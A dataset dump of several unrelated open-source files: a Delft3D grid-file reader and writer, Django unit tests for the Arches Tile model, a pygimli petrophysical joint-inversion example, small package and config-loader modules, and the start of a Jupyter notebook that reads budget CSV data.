content stringlengths 5 1.05M |
|---|
import re
import matplotlib.pyplot as plt
import numpy as np
from pyproj import CRS, Transformer
class GrdFile(object):
"""
Read, modify, visualize, export and write Deflt3D dep file
Examples
--------
>>> import delft3d
>>> grd = delft3d.GrdFile('example/example1.grd')
"""
def __init__(self, filename):
self.filename = filename
self.x, self.y = None, None
self.header = {}
self.load_file()
def load_file(self):
"""Read dep file"""
with open(self.filename, 'r') as f:
data = f.read()
# read headers
coordinate_system = re.search(r'Coordinate System = ([\w]+)', data)
self.header['Coordinate System'] = coordinate_system.group(1) if coordinate_system else None
missing_value = re.search(r'Missing Value\s+=\s+([\w+-.]+)', data)
self.header['Missing Value'] = np.float(missing_value.group(1)) if missing_value else 0
mn = re.search(r'\n\s+([\d]+)\s+([\d]+)\n', data)
m, n = int(mn.group(1)), int(mn.group(2))
self.header['MN'] = [m, n]
# read coordinates
x, y = [], []
pattern = r' ETA=\s+\d+(\s+[\d.Ee+-]+\n?){' + str(m) + '}'
matches = re.finditer(pattern, data)
for index, match in enumerate(matches):
cor = match[0].split()[2:]
cor = [np.float(num) for num in cor]
if index < n:
x.extend(cor)
else:
y.extend(cor)
x, y = np.array(x), np.array(y)
# reshape to the original format
self.x = x.reshape(n, m)
self.y = y.reshape(n, m)
def spherical_to_cartesian(self, sph_epsg=4326, car_epsg=3857):
"""
Convert from spherical coordinates to cartesian coordinates.
Default spherical coordinate system: WGS 84.
Default cartesian coordinate system: WGS_1984_Web_Mercator_Auxiliary_Sphere.
Find the EPSG of more coordinate system in the following link.
https://developers.arcgis.com/javascript/3/jshelp/pcs.htm
Parameters
----------
sph_epsg : int, optional
EPSG of the original spherical coordinate system
car_epsg : int, optional
EPSG of the objective cartesian coordinate system
Examples
----------
>>> import delft3d
>>> grd = delft3d.GrdFile('example/example1.grd')
>>> grd.spherical_to_cartesian()
>>> grd.spherical_to_cartesian(sph_epsg=4326, car_epsg=26917)
"""
if self.header['Coordinate System'] == 'Cartesian':
pass
else:
# transform from spherical to cartesian
init_crs = CRS.from_epsg(sph_epsg)
obj_crs = CRS.from_epsg(car_epsg)
projection = Transformer.from_crs(init_crs, obj_crs)
# update x, y
self.x, self.y = projection.transform(self.x, self.y)
# update header
self.header['Coordinate System'] = 'Cartesian'
def cartesian_to_spherical(self, car_epsg=3857, sph_epsg=4326):
"""
Convert from cartesian coordinates to spherical coordinates.
Default spherical coordinate system: WGS 84.
Default cartesian coordinate system: WGS_1984_Web_Mercator_Auxiliary_Sphere.
Find the EPSG of more coordinate system in the following link.
https://developers.arcgis.com/javascript/3/jshelp/pcs.htm
Parameters
----------
car_epsg : int, optional
EPSG of the original cartesian coordinate system
sph_epsg : int, optional
EPSG of the objective spherical coordinate system
Examples
----------
>>> import delft3d
>>> grd = delft3d.GrdFile('example/example1.grd')
>>> grd.cartesian_to_spherical()
>>> grd.cartesian_to_spherical(car_epsg=26917, sph_epsg=4326)
"""
if self.header['Coordinate System'] == 'Spherical':
pass
else:
# transform from cartesian to spherical
init_crs = CRS.from_epsg(car_epsg)
obj_crs = CRS.from_epsg(sph_epsg)
projection = Transformer.from_crs(init_crs, obj_crs)
# update x, y
self.x, self.y = projection.transform(self.x, self.y)
# update header
self.header['Coordinate System'] = 'Spherical'
def get_nearest_grid(self, x, y, sph_epsg=4326, car_epsg=3857):
"""
Find the nearest grid for the giving coordinate. If the coordinate system is
spherical, it will be automatically convert to cartesian coordinate system.
You can specify the EPSG of coordiante by assigning sph_egsp and car_epsg.
Find the EPSG of more coordinate system in the following link.
https://developers.arcgis.com/javascript/3/jshelp/pcs.htm
Parameters
----------
x : float
x coordinate.
y : float
y coordinate.
sph_epsg : int, optional
The EPSG of spherical cooridante.
car_epsg : int, optional
The EPSG of carsetian cooridante.
Returns
-------
m, n : tuple
(m,n) coordinate of grid
Examples
--------
>>> import delft3d
>>> grd = delft3d.GrdFile('example/example1.grd')
>>> m1, n1 = grd.get_nearest_grid(505944.89, 2497013.47)
>>> m2, n2 = grd.get_nearest_grid(505944.89, 2497013.47, sph_epsg=4326, car_epsg=26917)
"""
if self.header['Coordinate System'] == 'Spherical':
# transform from spherical to cartesian
grd_crs = CRS.from_epsg(sph_epsg)
plot_crs = CRS.from_epsg(car_epsg)
projection = Transformer.from_crs(grd_crs, plot_crs)
grd_x, grd_y = projection.transform(self.x, self.y)
print("Automatically transform from spherical to cartesian coordinates.\n"
"Change the default projection by giving specific grd_epsg and plot_epsg")
else:
grd_x, grd_y = self.x, self.y
# calculate distance
dis = np.sqrt(
(x - grd_x.ravel()) ** 2 + (y - grd_y.ravel()) ** 2)
# find nearest grid
num = np.argmin(dis)
n, m = np.unravel_index(num, (self.header['MN'][1], self.header['MN'][0]))
return m, n
def plot(self, filename=None, sph_epsg=4326, car_epsg=3857):
"""
Visualize the grid.If the coordinate system is spherical, it will be automatically
convert to cartesian coordinate system. You can specify the EPSG of coordiante
by assigning sph_egsp and car_epsg. Find the EPSG of more coordinate system in
the following link. https://developers.arcgis.com/javascript/3/jshelp/pcs.htm
Parameters
----------
filename : str, optional
If filename is given, the figure will be saved with the filename.
sph_epsg : int, optional
The EPSG of spherical cooridante.
car_epsg : int, optional
The EPSG of carsetian cooridante.
Examples
-------
>>> import delft3d
>>> grd = delft3d.GrdFile('example/example1.grd')
>>> grd.plot()
>>> grd.plot('test.jpg')
>>> grd.plot(sph_epsg=4326, car_epsg=26917)
"""
if self.header['Coordinate System'] == 'Spherical':
# transform from spherical to cartesian
grd_crs = CRS.from_epsg(sph_epsg)
plot_crs = CRS.from_epsg(car_epsg)
projection = Transformer.from_crs(grd_crs, plot_crs)
x, y = projection.transform(self.x, self.y)
print("Automatically transform from spherical to cartesian coordinates.\n"
"Change the default projection by giving specific grd_epsg and plot_epsg")
else:
x, y = self.x, self.y
x, y = x.copy(), y.copy()
# Prepossessing
z = np.zeros(np.shape(x)) # generate z for pcolormesh
# If any of the four corners of each grid is invalid(missing value),
# the grid is marked invalid. This prepossess make sure that pcolormesh
# won't generate weired grid because of the missing value
invlid = self.header['Missing Value'] # Missing Value
for i in range(x.shape[0] - 1):
for j in range(x.shape[1] - 1):
if x[i, j] == invlid or x[i + 1, j] == invlid or \
x[i, j + 1] == invlid or x[i + 1, j + 1] == invlid:
z[i, j] = 1
# mask the invalid grid to make it transparent in pcolormesh
z = np.ma.masked_equal(z, 1)
# interpolate the missing value in grd file
# otherwise the pcolormesh will include the missing value in grid
for index, arr in enumerate(x):
x1 = np.argwhere(arr == invlid).ravel()
x2 = np.argwhere(arr != invlid).ravel()
y2 = arr[arr != invlid]
x[index][x[index] == invlid] = np.interp(x1, x2, y2)
for index, arr in enumerate(y):
x1 = np.argwhere(arr == invlid).ravel()
x2 = np.argwhere(arr != invlid).ravel()
y2 = arr[arr != invlid]
y[index][y[index] == invlid] = np.interp(x1, x2, y2)
# plot grid
fig = plt.figure(figsize=(10, 8))
ax = fig.add_subplot(111)
ax.pcolormesh(x, y, z, edgecolor='black',
facecolor='none', linewidth=0.005)
ax.axis('equal')
if filename:
plt.savefig(filename)
plt.show()
def set_gird(self, x, y, coordinate_system):
"""
Set new grid.
Parameters
----------
x : ndarray
x coordinates of the new grid
y : ndarray
y coordinates of the new grid
coordinate_system : str
The type of coordinate system. Spherical or Cartesian
Examples
-------
>>> import delft3d
>>> grd = delft3d.GrdFile('example/example1.grd')
>>> grd_x = np.loadtxt('example/grd_x.txt')
>>> grd_y = np.loadtxt('example/grd_y.txt')
>>> grd.set_gird(grd_x, grd_y, 'Cartesian')
"""
self.x = x
self.y = y
self.header['Coordinate System'] = coordinate_system
self.header['MN'] = [x.shape[1], x.shape[0]]
def export(self):
"""
Export the data to a list in the format of Delft3D grd file.
Examples
-------
>>> import delft3d
>>> grd = delft3d.GrdFile('example/example1.grd')
>>> grd_file = grd.export()
>>> grd_file
['Coordinate System = Cartesian\\n',
'Missing Value = -9.9999900e+02\\n',
' 7 245\\n',
' 0 0 0\\n',
...]
"""
grd_file = list()
# Add header
grd_file.append("Coordinate System = %s\n" % self.header['Coordinate System'])
if self.header['Missing Value'] != 0:
grd_file.append("Missing Value = %.7e\n" % self.header['Missing Value'])
grd_file.append("%8d%8d\n" % ((self.header['MN'][0]), self.header['MN'][1]))
grd_file.append(" 0 0 0\n")
# Add grid data
grd_file = self.grid_writer(grd_file, self.x)
grd_file = self.grid_writer(grd_file, self.y)
return grd_file
@staticmethod
def grid_writer(grd_file, coordinates):
"""Helper function of self.export. Formatting grid data as Delft3D grd file"""
grd_file = grd_file.copy()
for index, cor in enumerate(coordinates):
line = " ETA=%5d" % (index + 1)
counts = 0
for num in cor:
if counts == 0:
line += " %.17E" % num
elif counts % 5 == 4:
line += " %.17E\n" % num
elif counts % 5 == 0:
line += " %.17E" % num
else:
line += " %.17E" % num
if counts == len(cor) - 1 and counts % 5 != 4:
line += '\n'
counts += 1
# grd_file.append(line)
line = line.splitlines()
line = [x + '\n' for x in line]
grd_file.extend(line)
return grd_file
def to_file(self, filename):
"""
Write the data to a Delft3D grd file.
Parameters
----------
filename : str
Filename of the grd file.
Examples
-------
>>> import delft3d
>>> grd = delft3d.GrdFile('example/example1.grd')
>>> grd.to_file('example1.grd')
"""
grd_file = self.export()
with open(filename, 'w') as f:
f.writelines(grd_file)
|
"""
ARCHES - a program developed to inventory and manage immovable cultural heritage.
Copyright (C) 2013 J. Paul Getty Trust and World Monuments Fund
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
"""
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from tests import test_settings
from tests.base_test import ArchesTestCase
from django.db import connection
from django.core import management
from django.contrib.auth.models import User
from django.http import HttpRequest
from arches.app.models.tile import Tile, TileCardinalityError
# these tests can be run from the command line via
# python manage.py test tests/models/tile_model_tests.py --pattern="*.py" --settings="tests.test_settings"
class TileTests(ArchesTestCase):
@classmethod
def setUpClass(cls):
for path in test_settings.RESOURCE_GRAPH_LOCATIONS:
management.call_command("packages", operation="import_graphs", source=path)
sql = """
INSERT INTO public.resource_instances(resourceinstanceid, legacyid, graphid, createdtime)
VALUES ('40000000-0000-0000-0000-000000000000', '40000000-0000-0000-0000-000000000000', '2f7f8e40-adbc-11e6-ac7f-14109fd34195', '1/1/2000');
INSERT INTO node_groups(nodegroupid, legacygroupid, cardinality)
VALUES ('99999999-0000-0000-0000-000000000001', '', 'n');
INSERT INTO node_groups(nodegroupid, legacygroupid, cardinality)
VALUES ('32999999-0000-0000-0000-000000000000', '', 'n');
INSERT INTO node_groups(nodegroupid, legacygroupid, cardinality)
VALUES ('19999999-0000-0000-0000-000000000000', '', 'n');
INSERT INTO node_groups(nodegroupid, legacygroupid, cardinality)
VALUES ('21111111-0000-0000-0000-000000000000', '', 'n');
"""
cursor = connection.cursor()
cursor.execute(sql)
@classmethod
def tearDownClass(cls):
sql = """
DELETE FROM public.node_groups
WHERE nodegroupid = '99999999-0000-0000-0000-000000000001' OR
nodegroupid = '32999999-0000-0000-0000-000000000000' OR
nodegroupid = '19999999-0000-0000-0000-000000000000' OR
nodegroupid = '21111111-0000-0000-0000-000000000000';
DELETE FROM public.resource_instances
WHERE resourceinstanceid = '40000000-0000-0000-0000-000000000000';
"""
cursor = connection.cursor()
cursor.execute(sql)
def setUp(self):
cursor = connection.cursor()
cursor.execute("Truncate public.tiles Cascade;")
def tearDown(self):
pass
def test_load_from_python_dict(self):
"""
Test that we can initialize a Tile object from a Python dictionary
"""
json = {
"tiles": [
{
"tiles": [],
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "19999999-0000-0000-0000-000000000000",
"tileid": "",
"data": {
"20000000-0000-0000-0000-000000000004": "TEST 1",
"20000000-0000-0000-0000-000000000002": "TEST 2",
"20000000-0000-0000-0000-000000000003": "TEST 3",
},
},
{
"tiles": [],
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "32999999-0000-0000-0000-000000000000",
"tileid": "",
"data": {"20000000-0000-0000-0000-000000000004": "TEST 4", "20000000-0000-0000-0000-000000000002": "TEST 5"},
},
],
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "20000000-0000-0000-0000-000000000001",
"tileid": "",
"data": {},
}
t = Tile(json)
self.assertEqual(t.resourceinstance_id, "40000000-0000-0000-0000-000000000000")
self.assertEqual(t.data, {})
self.assertEqual(t.tiles[0].data["20000000-0000-0000-0000-000000000004"], "TEST 1")
def test_save(self):
"""
Test that we can save a Tile object back to the database
"""
login = self.client.login(username="admin", password="admin")
json = {
"tiles": [
{
"tiles": [],
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
}
],
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "7204869c-adbc-11e6-8bec-14109fd34195",
"tileid": "",
"data": {},
}
t = Tile(json)
t.save(index=False)
tiles = Tile.objects.filter(resourceinstance_id="40000000-0000-0000-0000-000000000000")
self.assertEqual(tiles.count(), 2)
def test_simple_get(self):
"""
Test that we can get a Tile object
"""
json = {
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
}
t = Tile(json)
t.save(index=False)
t2 = Tile.objects.get(tileid=t.tileid)
self.assertEqual(t.tileid, t2.tileid)
self.assertEqual(t2.data["72048cb3-adbc-11e6-9ccf-14109fd34195"], "TEST 1")
def test_create_new_authoritative(self):
"""
Test that a new authoritative tile is created when a user IS a reviwer.
"""
self.user = User.objects.get(username="admin")
json = {
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "AUTHORITATIVE"},
}
authoritative_tile = Tile(json)
request = HttpRequest()
request.user = self.user
authoritative_tile.save(index=False, request=request)
self.assertEqual(authoritative_tile.is_provisional(), False)
def test_create_new_provisional(self):
"""
Test that a new provisional tile is created when a user IS NOT a reviwer.
"""
self.user = User.objects.create_user(username="testuser", password="TestingTesting123!")
json = {
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "PROVISIONAL"},
}
provisional_tile = Tile(json)
request = HttpRequest()
request.user = self.user
provisional_tile.save(index=False, request=request)
self.assertEqual(provisional_tile.is_provisional(), True)
def test_save_provisional_from_athoritative(self):
"""
Test that a provisional edit is created when a user that is not a
reviewer edits an athoritative tile
"""
json = {
"tiles": [
{
"tiles": [],
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "AUTHORITATIVE"},
}
],
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "7204869c-adbc-11e6-8bec-14109fd34195",
"tileid": "",
"data": {},
}
t = Tile(json)
t.save(index=False)
self.user = User.objects.create_user(username="testuser", password="TestingTesting123!")
login = self.client.login(username="testuser", password="TestingTesting123!")
tiles = Tile.objects.filter(resourceinstance_id="40000000-0000-0000-0000-000000000000")
provisional_tile = None
for tile in tiles:
provisional_tile = tile
provisional_tile.data["72048cb3-adbc-11e6-9ccf-14109fd34195"] = "PROVISIONAL"
request = HttpRequest()
request.user = self.user
provisional_tile.save(index=False, request=request)
tiles = Tile.objects.filter(resourceinstance_id="40000000-0000-0000-0000-000000000000")
provisionaledits = provisional_tile.provisionaledits
self.assertEqual(tiles.count(), 2)
self.assertEqual(provisional_tile.data["72048cb3-adbc-11e6-9ccf-14109fd34195"], "AUTHORITATIVE")
self.assertEqual(provisionaledits[str(self.user.id)]["action"], "update")
self.assertEqual(provisionaledits[str(self.user.id)]["status"], "review")
def test_tile_cardinality(self):
"""
Tests that the tile is not saved if the cardinality is violated
by testin to save a tile with the same values as existing one
"""
self.user = User.objects.get(username="admin")
first_json = {
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "AUTHORITATIVE"},
}
first_tile = Tile(first_json)
request = HttpRequest()
request.user = self.user
first_tile.save(index=False, request=request)
second_json = {
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "AUTHORITATIVE"},
}
second_tile = Tile(second_json)
with self.assertRaises(TileCardinalityError):
second_tile.save(index=False, request=request)
def test_apply_provisional_edit(self):
"""
Tests that provisional edit data is properly created
"""
json = {
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
}
user = User.objects.create_user(username="testuser", password="TestingTesting123!")
provisional_tile = Tile(json)
request = HttpRequest()
request.user = user
provisional_tile.save(index=False, request=request)
provisional_tile.apply_provisional_edit(user, {"test": "test"}, "update")
provisionaledits = provisional_tile.provisionaledits
userid = str(user.id)
self.assertEqual(provisionaledits[userid]["action"], "update")
self.assertEqual(provisionaledits[userid]["reviewer"], None)
self.assertEqual(provisionaledits[userid]["value"], {"test": "test"})
self.assertEqual(provisionaledits[userid]["status"], "review")
self.assertEqual(provisionaledits[userid]["reviewtimestamp"], None)
def test_user_owns_provisional(self):
"""
Tests that a user is the owner of a provisional edit
"""
json = {
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
}
user = User.objects.create_user(username="testuser", password="TestingTesting123!")
provisional_tile = Tile(json)
request = HttpRequest()
request.user = user
provisional_tile.save(index=False, request=request)
self.assertEqual(provisional_tile.user_owns_provisional(user), True)
def test_tile_deletion(self):
"""
Tests that a tile is deleted when a user is a reviewer or owner.
"""
json = {
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
}
owner = User.objects.create_user(username="testuser", password="TestingTesting123!")
reviewer = User.objects.get(username="admin")
tile1 = Tile(json)
owner_request = HttpRequest()
owner_request.user = owner
tile1.save(index=False, request=owner_request)
tile1.delete(request=owner_request)
tile2 = Tile(json)
reviewer_request = HttpRequest()
reviewer_request.user = reviewer
tile2.save(index=False, request=reviewer_request)
tile2.delete(request=reviewer_request)
self.assertEqual(len(Tile.objects.all()), 0)
def test_provisional_deletion(self):
"""
Tests that a tile is NOT deleted if a user does not have the
privlages to delete a tile and that the proper provisionaledit is
applied.
"""
json = {
"resourceinstance_id": "40000000-0000-0000-0000-000000000000",
"parenttile_id": "",
"nodegroup_id": "72048cb3-adbc-11e6-9ccf-14109fd34195",
"tileid": "",
"data": {"72048cb3-adbc-11e6-9ccf-14109fd34195": "TEST 1"},
}
provisional_user = User.objects.create_user(username="testuser", password="TestingTesting123!")
reviewer = User.objects.get(username="admin")
tile = Tile(json)
reviewer_request = HttpRequest()
reviewer_request.user = reviewer
tile.save(index=False, request=reviewer_request)
provisional_request = HttpRequest()
provisional_request.user = provisional_user
tile.delete(request=provisional_request)
self.assertEqual(len(Tile.objects.all()), 1)
# def test_validation(self):
# """
# Test that we can get a Tile object
# """
# json = {
# "tiles": {},
# "resourceinstance_id": "40000000-0000-0000-0000-000000000000",
# "parenttile_id": '',
# "nodegroup_id": "20000000-0000-0000-0000-000000000001",
# "tileid": "",
# "data": {
# "20000000-0000-0000-0000-000000000004": "TEST 1"
# }
# }
# t = Tile(json)
# self.assertTrue(t.validate()['is_valid'])
# json['data']['20000000-0000-0000-0000-000000000004'] = ''
# t2 = Tile(json)
# self.assertFalse(t2.validate()['is_valid'])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Example for Petrophysical-Joint-Inversion."""
import numpy as np
import pygimli as pg
from pygimli import meshtools as mt
from pygimli.physics.petro import PetroInversion, JointPetroInversion
from pygimli.physics.petro import transFwdArchieS as ArchieTrans
from pygimli.physics.petro import transFwdWyllieS as WyllieTrans
def createSynthModel():
"""Return the modeling mesh, the porosity distribution and the
parametric mesh for inversion.
"""
# Create the synthetic model
world = mt.createCircle(boundaryMarker=-1, segments=64)
tri = mt.createPolygon([[-0.8, -0], [-0.5, -0.7], [0.7, 0.5]],
isClosed=True, area=0.0015)
c1 = mt.createCircle(radius=0.2, pos=[-0.2, 0.5], segments=32,
area=0.0025, marker=3)
c2 = mt.createCircle(radius=0.2, pos=[0.32, -0.3], segments=32,
area=0.0025, marker=3)
poly = mt.mergePLC([world, tri, c1, c2])
poly.addRegionMarker([0.0, 0, 0], 1, area=0.0015)
poly.addRegionMarker([-0.9, 0, 0], 2, area=0.0015)
c = mt.createCircle(radius=0.99, segments=16, start=np.pi, end=np.pi*3)
[poly.createNode(p.pos(), -99) for p in c.nodes()]
mesh = pg.meshtools.createMesh(poly, q=34.4, smooth=[1, 10])
mesh.scale(1.0/5.0)
mesh.rotate([0., 0., 3.1415/3])
mesh.rotate([0., 0., 3.1415])
petro = pg.solver.parseArgToArray([[1, 0.9], [2, 0.6], [3, 0.3]],
mesh.cellCount(), mesh)
# Create the parametric mesh that only reflect the domain geometry
world = mt.createCircle(boundaryMarker=-1, segments=32, area=0.0051)
paraMesh = pg.meshtools.createMesh(world, q=34.0, smooth=[1, 10])
paraMesh.scale(1.0/5.0)
return mesh, paraMesh, petro
def showModel(ax, model, mesh, petro=1, cMin=None, cMax=None, label=None,
savefig=None, showMesh=False):
"""Utility function to show and save models for the CG paper."""
if cMin is None:
cMin = 0.3
if cMax is None:
cMax = 1.0
if petro:
ax, _ = pg.show(mesh, model, label=label,
cMin=cMin, cMax=cMax, logScale=0, ax=ax,
cMap='viridis', hold=1)
else:
ax, _ = pg.show(mesh, model, label=label,
logScale=1, ax=ax, cMin=cMin, cMax=cMax, hold=1)
ticks = [-.2, -.1, 0, .1, .2]
ax.xaxis.set_ticks(ticks)
ax.yaxis.set_ticks(ticks)
pg.mplviewer.drawSensors(ax, ertData.sensorPositions(), diam=0.005)
# despine(ax=ax, offset=5, trim=True)
if showMesh:
pg.mplviewer.drawSelectedMeshBoundaries(ax, mesh.boundaries(),
linewidth=0.3, color="0.2")
if savefig:
pg.mplviewer.saveAxes(ax, savefig, adjust=False)
return ax
# Script starts here
axs = [None]*8
# Create synthetic model
mMesh, pMesh, saturation = createSynthModel()
# Create Petrophysical models
ertTrans = ArchieTrans(rFluid=20, phi=0.3)
res = ertTrans(saturation)
ttTrans = WyllieTrans(vm=4000, phi=0.3)
vel = 1./ttTrans(saturation)
# Simulate synthetic data with appropriate noise
sensors = mMesh.positions()[mMesh.findNodesIdxByMarker(-99)]
print("-Simulate ERT" + "-" * 50)
ERT = pg.physics.ERTManager(verbose=False)
ertScheme = pg.physics.ert.createERTData(sensors, schemeName='dd', closed=1)
ertData = ERT.simulate(mMesh, res, ertScheme, noiseLevel=0.01)
print("-Simulate Traveltime" + "-" * 50)
TT = pg.physics.Refraction(verbose=False)
ttScheme = pg.physics.traveltime.createRAData(sensors)
ttData = TT.simulate(mMesh, vel, ttScheme, noiseLevel=0.01, noiseAbs=4e-6)
# Classic inversions
print("-ERT" + "-" * 50)
resInv = ERT.invert(ertData, mesh=pMesh, zWeight=1, lam=20)
ERT.inv.echoStatus()
print("-TT" + "-" * 50)
velInv = TT.invert(ttData, mesh=pMesh, lam=100, useGradient=0, zWeight=1)
TT.inv.echoStatus()
print("-ERT-Petro" + "-" * 50)
invERTPetro = PetroInversion(ERT, ertTrans)
satERT = invERTPetro.invert(ertData, mesh=pMesh, limits=[0., 1.], lam=10)
invERTPetro.inv.echoStatus()
print("-TT-Petro" + "-" * 50)
invTTPetro = PetroInversion(TT, ttTrans)
satTT = invTTPetro.invert(ttData, mesh=pMesh, limits=[0., 1.], lam=5)
invTTPetro.inv.echoStatus()
# Petrophysical joint inversion
print("-Joint-Petro" + "-" * 50)
invJointPetro = JointPetroInversion([ERT, TT], [ertTrans, ttTrans])
satJoint = invJointPetro.invert([ertData, ttData], mesh=pMesh,
limits=[0., 1.], lam=5)
invJointPetro.inv.echoStatus()
# Show results
ERT.showData(ertData)
TT.showVA(ttData)
showModel(axs[0], saturation, mMesh, showMesh=1,
label=r'Saturation (${\tt petro}$)', savefig='petro')
showModel(axs[1], res, mMesh, petro=0, cMin=250, cMax=2500, showMesh=1,
label=r'Resistivity (${\tt res}$) in $\Omega$m',
savefig='resistivity')
showModel(axs[5], vel, mMesh, petro=0, cMin=1000, cMax=2500, showMesh=1,
label=r'Velocity (${\tt vel}$) in m$/$s', savefig='velocity')
showModel(axs[2], resInv, pMesh, 0, cMin=250, cMax=2500,
label=r'Resistivity (${\tt resInv}$) in $\Omega$m', savefig='invERT')
showModel(axs[6], velInv, pMesh, 0, cMin=1000, cMax=2500,
label=r'Velocity (${\tt velInv}$) in m$/$s', savefig='invTT')
showModel(axs[3], satERT, pMesh,
label=r'Saturation (${\tt satERT}$)', savefig='invERTPetro')
showModel(axs[7], satTT, pMesh,
label=r'Saturation (${\tt satTT}$)', savefig='invTTPetro')
showModel(axs[4], satJoint, pMesh,
label=r'Saturation (${\tt satJoint}$)', savefig='invJointPetro')
# just hold figure windows open if run outside from spyder, ipython or similar
pg.wait()
|
from .esn import ESNBase, LeakyESN, MultiringESN
from .readout import Linear
__all__ = ['ESNBase', 'LeakyESN', 'MultiringESN', 'Linear']
|
from typing import Dict
from modularconfig.errors import LoadingError
name = "int"
aliases = ["integer"]
def load(text: str, options: Dict[str, str]) -> int:
"""Try to load a number as a int.py"""
text = text.strip()
try:
return int(text)
except ValueError as e:
raise LoadingError("Can't convert to an integer") from e |
{
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"id": "5e57b953-5f8d-42f1-9cf6-88c1e2aa89c5",
"metadata": {},
"outputs": [],
"source": [
"import os\n",
"import csv\n",
"\n",
"#Creates file path\n",
"budget_csv = os.path.join(\".\", \"budget_data.csv\")\n"
]
},
{
"cell_type": "code",
"execution_count": 2,
"id": "68c980c2-b53d-43bd-bed4-dc5a825d009d",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"<_csv.reader object at 0x000002C3367250A0>\n",
"CSV Header: ['Date', 'Profit/Losses']\n"
]
}
],
"source": [
"# Openning file\n",
"with open(budget_csv) as csvfile:\n",
"\n",
" # CSV reader specifies delimiter and variable that holds contents\n",
" csvreader = csv.reader(csvfile, delimiter=',')\n",
" print(csvreader)\n",
"\n",
" # Read the header row first \n",
" csv_header = next(csvreader)\n",
" print(f\"CSV Header: {csv_header}\")\n",
"\n",
" date_lst = []\n",
" lose_prof_lst = []\n",
" \n",
" # Read each row of data after the header\n",
" for row in csvreader:\n",
" date = row[0]\n",
" date_lst.append(date) # adding the element to the date list\n",
" \n",
" lose_prof = float(row[1]) \n",
" lose_prof_lst.append(lose_prof) # adding the element to the lose/profit list\n",
" "
]
},
{
"cell_type": "code",
"execution_count": 3,
"id": "07c3b897-dc72-401b-8f4b-ff2550b4b708",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
